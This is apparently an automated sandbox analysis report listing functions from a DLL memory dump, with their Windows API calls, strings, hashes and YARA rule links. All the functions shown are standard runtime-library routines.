Instruction ID: 09ae806c2ee442b234462fc69b41237b6f593f7b1912a61e7236b9dcf1e7e438
Opcode Fuzzy Hash: dd79b9efcfb6bf1ff7fcc1bec4cf58cca064d675e9770f9f060e63fe3f30dada
Instruction Fuzzy Hash: F741C438A04259EBCF00CFB9C880E9EBBB9AF4571CF10855BD9145B391D736DA06CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DA294, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E4CED16,6E4FD0A0,0000000C,00000004,00000001,00000004,?,6E4B4865,00000000,00000000), ref: 6E4DA298
_free.LIBCMT ref: 6E4DA2EF
_free.LIBCMT ref: 6E4DA323
SetLastError.KERNEL32(00000000,?,?,?,00000000,FFFFFFFF,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA330
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6E4B4865,00000000,00000000), ref: 6E4DA33C
_abort.LIBCMT ref: 6E4DA342

Strings

ios_base::failbit set, xrefs: 6E4DA296

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID: ios_base::failbit set
API String ID: 3160817290-3924258884
Opcode ID: 571d3816b29fcf9f8e84ed24263d68476ec3feed314282efc88e22d2d6c0ee86
Instruction ID: d270930ab87430578cc73e004956bf821624c32d6c6f0e7d3cc50df48e766058
Opcode Fuzzy Hash: 571d3816b29fcf9f8e84ed24263d68476ec3feed314282efc88e22d2d6c0ee86
Instruction Fuzzy Hash: AA112B32548E012BDA5126F5BD74EAA372EAFC3A74B240A1FF534D23C4EF31990DA151

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C6698, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E4C669F
std::_Lockit::_Lockit.LIBCPMT ref: 6E4C66A9

Part of subcall function 6E4B19B0: std::_Lockit::_Lockit.LIBCPMT ref: 6E4B19CD
Part of subcall function 6E4B19B0: std::_Lockit::~_Lockit.LIBCPMT ref: 6E4B19E9

codecvt.LIBCPMT ref: 6E4C66E3
std::_Facet_Register.LIBCPMT ref: 6E4C66FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6E4C671A
__CxxThrowException@8.LIBVCRUNTIME ref: 6E4C6738

Strings

;\Ln, xrefs: 6E4C6707

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID: ;\Ln
API String ID: 2594415655-2500737854
Opcode ID: 16708ce177b7e56fc65989889b817de50a8282154b8c2d6ca51a0abd3832c41a
Instruction ID: 6ee7c11219a194861ad5e7f08b71c05bae05f43ea699a2ff4bd64066a629867e
Opcode Fuzzy Hash: 16708ce177b7e56fc65989889b817de50a8282154b8c2d6ca51a0abd3832c41a
Instruction Fuzzy Hash: 50118B799002199BCB01DBF0C850EFD77B86B88B18F15494BE4116B290DF3499048B92

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C83A7, Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6E4C8550,00000000), ref: 6E4C83CB
HeapAlloc.KERNEL32(00000000), ref: 6E4C83D2

Part of subcall function 6E4C849D: IsProcessorFeaturePresent.KERNEL32(0000000C,6E4C83B9,00000000,?,6E4C8550,00000000), ref: 6E4C849F

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,6E4C8550,00000000), ref: 6E4C83E2
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 6E4C8409
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000), ref: 6E4C841D
InterlockedPopEntrySList.KERNEL32(00000000), ref: 6E4C8430
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E4C8443

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: 09958764a47752c44f407ea708a9e21e2f982714d6cee15b24ddfc2febbce105
Instruction ID: a04af1b448ecd533f16632674ee0150efe029cec2ef562fb7415b7c42ecb8ed5
Opcode Fuzzy Hash: 09958764a47752c44f407ea708a9e21e2f982714d6cee15b24ddfc2febbce105
Instruction Fuzzy Hash: 0E11D33A640E12BBEA211BB69C48F6A766CEB4AB95F010426F905D7244EB60FC0046B6

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C0AC0, Relevance: 10.8, APIs: 7, Instructions: 267COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6E501478,2B098C7C), ref: 6E4C0B1D
GetModuleFileNameW.KERNEL32(?,00000104), ref: 6E4C0BA4
LoadTypeLib.OLEAUT32(?,00000000), ref: 6E4C0BD5
LoadRegTypeLib.OLEAUT32(6E4F9538,00000000,00000000,?,00000000), ref: 6E4C0BFD
EnterCriticalSection.KERNEL32(6E501494), ref: 6E4C0DC0
LeaveCriticalSection.KERNEL32(6E501494), ref: 6E4C0DD6

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLoadType$FileLeaveModuleName
String ID:
API String ID: 1976781235-0
Opcode ID: c83de3825bffa9d88713cb160681655030f7552b3ed324352ae1b3da3961e6e5
Instruction ID: c8d02ceb519ed15fe6d5c49c2706fbacca762aebb03dd555fa14aa6cf1169adc
Opcode Fuzzy Hash: c83de3825bffa9d88713cb160681655030f7552b3ed324352ae1b3da3961e6e5
Instruction Fuzzy Hash: ACB18EB8901619DFDB20DBB4C858F9AB7B4AF49B04F2444DAE8099B340E735EE45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E49E1, Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E4E4A50
_free.LIBCMT ref: 6E4E4A5E
_free.LIBCMT ref: 6E4E4B8C
_free.LIBCMT ref: 6E4E4B97

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 2330e4e7f902e50aa7d818dceef7211b750893ee25ba6eac16604aff2300d7f8
Instruction ID: ebf2b888ed3a0f57b69d91f80058e6d6661295ce2e8b242cdd29af6ee7b6cbc9
Opcode Fuzzy Hash: 2330e4e7f902e50aa7d818dceef7211b750893ee25ba6eac16604aff2300d7f8
Instruction Fuzzy Hash: E961CE72D04605AFDB10CFB8C840F9ABBF9FB45761F2045ABE954EB781E77099428B90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C3DA0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 196COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6E4B0000,?,00000104), ref: 6E4C3E7D
GetModuleHandleW.KERNEL32(00000000), ref: 6E4C3EF7

Strings

Module, xrefs: 6E4C3FA2
APPID, xrefs: 6E4C3E3D
Module_Raw, xrefs: 6E4C3FD3
REGISTRY, xrefs: 6E4C4030

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: 8ff2689982f2156e134ac7745be6821f7e0a856a2a278bb5662dbc1df78b32a3
Instruction ID: 829e2f747a2a9bd90bb02f1036739dd7cc5a2bea2683085b179fd764f920ec03
Opcode Fuzzy Hash: 8ff2689982f2156e134ac7745be6821f7e0a856a2a278bb5662dbc1df78b32a3
Instruction Fuzzy Hash: 2371E7399002198BDB64DFB4CC94FEA7378AF85B14F0105EED80AAB680DB755E45CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C03B0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6E4B0000,?,00000104), ref: 6E4C048D
GetModuleHandleW.KERNEL32(00000000), ref: 6E4C0507

Strings

Module, xrefs: 6E4C05B2
APPID, xrefs: 6E4C044D
Module_Raw, xrefs: 6E4C05DF
REGISTRY, xrefs: 6E4C063D

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Module$FileHandleName
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 4146042529-2529269209
Opcode ID: 383ec33f460ba3888b21f776bb3d58233ca69144634af58ed5ea2f76712301db
Instruction ID: ead0d1d36b47c39cbfb5cd8684c8270c3bc3272b8577954fcc4bf5d88b760a17
Opcode Fuzzy Hash: 383ec33f460ba3888b21f776bb3d58233ca69144634af58ed5ea2f76712301db
Instruction Fuzzy Hash: 6E61B7799002198BDB64CFB0CC50FDE7378AF85B14F4005AED90AA7640EB755E45CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 6E4BEBD0, Relevance: 10.7, APIs: 7, Instructions: 162libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000060), ref: 6E4BEC5D
LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 6E4BEC6F
FindResourceW.KERNEL32(00000000,?,?), ref: 6E4BEC96
LoadResource.KERNEL32(00000000,00000000), ref: 6E4BECAE

Part of subcall function 6E4BE270: GetLastError.KERNEL32(6E4BED79), ref: 6E4BE270

FreeLibrary.KERNEL32(00000000,00000000,?), ref: 6E4BED9F

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$Resource$ErrorFindFreeLast
String ID:
API String ID: 328770362-0
Opcode ID: f62784d23e01e4debd9f7227640f63195c9b2aadb4e97d8b23f2837c45691f2f
Instruction ID: 502d61e3475ec7ca14e930e2d743ff0b709cecfae66413952bfde60e47069ab8
Opcode Fuzzy Hash: f62784d23e01e4debd9f7227640f63195c9b2aadb4e97d8b23f2837c45691f2f
Instruction Fuzzy Hash: 2851E4B1A0021EDFDB20CBB4CC80F9D77B8EF89714F1005DAF609A7241D7709A418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DFABC, Relevance: 10.7, APIs: 7, Instructions: 160fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,6E4E024E,?,?,?,?,?), ref: 6E4DFAFE
__fassign.LIBCMT ref: 6E4DFB80
__fassign.LIBCMT ref: 6E4DFB9F
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 6E4DFBCC
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,6E4E024E), ref: 6E4DFBEB
WriteFile.KERNEL32(?,?,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,6E4E024E), ref: 6E4DFC24

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 6968fcec16408374fed10b7c21275824175e32f1968fa39400cf47555f76270f
Instruction ID: 8c9dd6dbca2407a20ae643b2cf0ef35799b1e1f2d85ee0fe1f8807dc59048641
Opcode Fuzzy Hash: 6968fcec16408374fed10b7c21275824175e32f1968fa39400cf47555f76270f
Instruction Fuzzy Hash: 0E519D709052499FDB20CFB8D8A4AEEBBF8FF09700F24451BE955E7251D730AA55CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C8680, Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,2B098C7C,?,00000000,?,00000000,8007000E), ref: 6E4C86F3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 6E4C872A

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 29a40a281b7eb56018482a512d6c747a5766c350a3dac908ca4aa473801dbfef
Instruction ID: 60a4ce51cb4149c10ad1f327ddc755cbbf9235a18bb2d40b36845ae1f59cd30e
Opcode Fuzzy Hash: 29a40a281b7eb56018482a512d6c747a5766c350a3dac908ca4aa473801dbfef
Instruction Fuzzy Hash: 1A31F879700649ABD7109FB49C05FAAB7A8EB44F54F10452EF905E7380E775B50086A6

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C3380, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,00000024,00000000), ref: 6E4C3410
GetWindowLongW.USER32 ref: 6E4C3424
CallWindowProcW.USER32(?,?,00000082,00000024,00000000), ref: 6E4C343A
GetWindowLongW.USER32 ref: 6E4C3453
SetWindowLongW.USER32(?,000000FC,?), ref: 6E4C3462

Strings

$, xrefs: 6E4C33C4

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Long$CallProc
String ID: $
API String ID: 513923721-3993045852
Opcode ID: 388cf048c68420376cc04b1dd6f2382b8e276b6825f3c0c5ef8f273b87851cce
Instruction ID: a6c6b136d118dfe076b77b8ba710eb2f18948c672f343c8c05a0f669ecfef0fd
Opcode Fuzzy Hash: 388cf048c68420376cc04b1dd6f2382b8e276b6825f3c0c5ef8f273b87851cce
Instruction Fuzzy Hash: 7A414A75900709AFCB21DFA9D848A9EBBF5FF48710F10865EE856A7260C731A904CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4BE440, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 86registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,2B098C7C), ref: 6E4BE494
GetProcAddress.KERNEL32(00000000,RegOpenKeyTransactedW), ref: 6E4BE4AB
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,00000000,2B098C7C), ref: 6E4BE4E0
RegCloseKey.ADVAPI32(00000000), ref: 6E4BE4F3

Strings

Advapi32.dll, xrefs: 6E4BE48F
RegOpenKeyTransactedW, xrefs: 6E4BE4A5

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 823179699-3913318428
Opcode ID: 95c37142bf68f5dcd244e2986d346a5220678ef476c04161e75e46181d03e61f
Instruction ID: 2149317a6b83a2c476fe81547a614e1642f8a579b5e4a7c8c2024834c5861a2d
Opcode Fuzzy Hash: 95c37142bf68f5dcd244e2986d346a5220678ef476c04161e75e46181d03e61f
Instruction Fuzzy Hash: D1317871A04609EFDB24CFB6C984F6BB7B9EB85710F10856AF915DB344D774A900CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B8BF0, Relevance: 10.6, APIs: 7, Instructions: 82memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6E4B8C21
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E4B8C2F
MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000), ref: 6E4B8C44
SysFreeString.OLEAUT32(00000000), ref: 6E4B8C4F
VarBstrCmp.OLEAUT32(?,00000000,00000400,00000000), ref: 6E4B8C76
SysFreeString.OLEAUT32(00000000), ref: 6E4B8C83
SysFreeString.OLEAUT32 ref: 6E4B8CB2

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr
String ID:
API String ID: 1801994256-0
Opcode ID: 905518db7ef4202c927812a52271ec2ab3fe6968800af18f505e76533495ffba
Instruction ID: efdf9365842522cfccb5d463866d4ff7de525bf89631f266603de9004fb2e45f
Opcode Fuzzy Hash: 905518db7ef4202c927812a52271ec2ab3fe6968800af18f505e76533495ffba
Instruction Fuzzy Hash: B7113A71641716BFCB216FB49C49F9E7B74EF46B20F10016AFA11AB2C0CB706904C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4DDFA3, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON

Download Yara Rule

Strings

ext-ms-, xrefs: 6E4DE00D
api-ms-, xrefs: 6E4DDFF9

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 3718ad9cbf7914523c99657d95fcd63cf7e3a917e215ad1855537297c57e020b
Instruction ID: 2dd25dc25c55568a7e4e6ab807f63616600a024da7924f30d31d0ab8e4974092
Opcode Fuzzy Hash: 3718ad9cbf7914523c99657d95fcd63cf7e3a917e215ad1855537297c57e020b
Instruction Fuzzy Hash: CE210831E4163AEBCB735AB98CE0F5BB7689F42760F110217ED15A7382D671E809C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B21F0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 6E4B221D

Part of subcall function 6E4C94A7: RaiseException.KERNEL32(?,?,6E4C6476,000000FF,00000000,00000000,FFFFFFFF,?,?,?,?,6E4C6476,000000FF,6E4FCD2C,?,000000FF), ref: 6E4C9507

__CxxThrowException@8.LIBVCRUNTIME ref: 6E4B2262
___std_exception_copy.LIBVCRUNTIME ref: 6E4B228F

Strings

ios_base::failbit set, xrefs: 6E4B2135, 6E4B2231
ios_base::badbit set, xrefs: 6E4B2227, 6E4B2252, 6E4B2273
ios_base::eofbit set, xrefs: 6E4B2236

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3941765731-1866435925
Opcode ID: 4284c2490bf54d2b8922ff91ceb54bf56200a5b0f5b9669945899f68b8e88655
Instruction ID: 62b06b8d8d24ebd271fe1508750735d392b79ebf6cbd775f9e33aa972303c146
Opcode Fuzzy Hash: 4284c2490bf54d2b8922ff91ceb54bf56200a5b0f5b9669945899f68b8e88655
Instruction Fuzzy Hash: A211D5B29103056FC710CEF9D801FC6B3DCAF59610F04892BFA64DB640EB71A5158BE5

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E4EB6, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6E4E4BFD: _free.LIBCMT ref: 6E4E4C26

_free.LIBCMT ref: 6E4E4F04

Part of subcall function 6E4D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BAE
Part of subcall function 6E4D9B98: GetLastError.KERNEL32(6E4D6995,?,6E4D731A,000000FF,000000FF), ref: 6E4D9BC0

_free.LIBCMT ref: 6E4E4F0F
_free.LIBCMT ref: 6E4E4F1A
_free.LIBCMT ref: 6E4E4F6E
_free.LIBCMT ref: 6E4E4F79
_free.LIBCMT ref: 6E4E4F84
_free.LIBCMT ref: 6E4E4F8F

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction ID: 19b1b765133a2b6bf396f504fba26fd2412349faa529b9e62fd85f09d430a553
Opcode Fuzzy Hash: 66e6ae1406271942d4d26fff22205feaaa92d3e50f6340eba5de2b4b63487633
Instruction Fuzzy Hash: 64115E71960B08BED620ABF0CC15FCB779CAF0174AF400C2FA29EE6451DB75F50A86A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4D6A30, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E4D69E1,6E4D69A9), ref: 6E4D6A50
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E4D6A63
FreeLibrary.KERNEL32(00000000,?,?,?,6E4D69E1,6E4D69A9), ref: 6E4D6A86

Strings

mscoree.dll, xrefs: 6E4D6A49
;\Ln, xrefs: 6E4D6A74
CorExitProcess, xrefs: 6E4D6A5B

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: ;\Ln$CorExitProcess$mscoree.dll
API String ID: 4061214504-2813587842
Opcode ID: 2a8914b4d9d2d2bc19ffcc131e4bd71dd0b7058ed5e7ed87dbe50961faa21e90
Instruction ID: fb5b0b5257eaa2cad533ab63830d7e9119a96ef5e3415d94588253f600e80fe0
Opcode Fuzzy Hash: 2a8914b4d9d2d2bc19ffcc131e4bd71dd0b7058ed5e7ed87dbe50961faa21e90
Instruction Fuzzy Hash: 2EF0A430501708BBCF11AFB4D818FEEBFB8EF05611F0141A5E809A6351CB305945CA90

Uniqueness

Uniqueness Score: -1.00%

Function 6E4BEEB0, Relevance: 9.1, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,2B098C7C,00000000,00000000), ref: 6E4BEEEE
CharNextW.USER32(00000000,?,?,00000000), ref: 6E4BEF1B
CharNextW.USER32(745EEEF0,?,?,00000000), ref: 6E4BEF34
CharNextW.USER32(745EEEF0,?,?,00000000), ref: 6E4BEF3F
CharNextW.USER32(00000001,?,?,00000000), ref: 6E4BEFAE

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: 90d83e89b8f620ecd18f9b5a7e7061527a77beab191d40a3308ef226a39ecffe
Instruction ID: 9edde1a37abcac5f55624d204641e7136616991bc2be6654171e8484c858a9b8
Opcode Fuzzy Hash: 90d83e89b8f620ecd18f9b5a7e7061527a77beab191d40a3308ef226a39ecffe
Instruction Fuzzy Hash: 0141FB39A1411ADFCB10DFB9D880969B7F2EFC9311F6144A7E449C7358E7719942C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B4460, Relevance: 9.1, APIs: 6, Instructions: 129COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6E4B44A9
std::_Lockit::_Lockit.LIBCPMT ref: 6E4B44CB
